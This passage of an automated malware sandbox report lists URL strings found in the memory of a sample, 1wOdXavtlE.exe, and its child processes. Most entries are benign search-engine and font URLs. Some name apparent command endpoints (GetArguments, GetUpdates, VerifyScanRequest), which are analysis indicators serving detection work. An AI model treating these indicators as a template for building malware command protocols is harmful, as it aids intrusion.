Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.datacontract.org
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/BrowserExtension.Objects.Enums
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: http://service.r
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: http://support.a
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: http://support.apple.com/kb/HT203092
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/0
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetArguments
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetArgumentsResponse
Source: 1wOdXavtlE.exe, 00000002.00000002.485447672.0000000002CF5000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyScanRe
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyScanRequest
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyScanRequestResponse
Source: 1wOdXavtlE.exe, 00000002.00000002.486054377.0000000002DFF000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: 1wOdXavtlE.exe, 00000002.00000002.531321702.0000000008140000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.531321702.0000000008140000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000000.00000002.348197996.0000000000E37000.00000004.00000040.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: 1wOdXavtlE.exe, 00000000.00000002.348197996.0000000000E37000.00000004.00000040.sdmp	String found in binary or memory: http://www.fontbureau.coma9
Source: 1wOdXavtlE.exe, 00000000.00000002.348197996.0000000000E37000.00000004.00000040.sdmp	String found in binary or memory: http://www.fontbureau.comicta
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: svchost.exe, 0000000F.00000003.439186439.00000221A3B95000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 0000000F.00000003.439186439.00000221A3B95000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/termsofservice
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
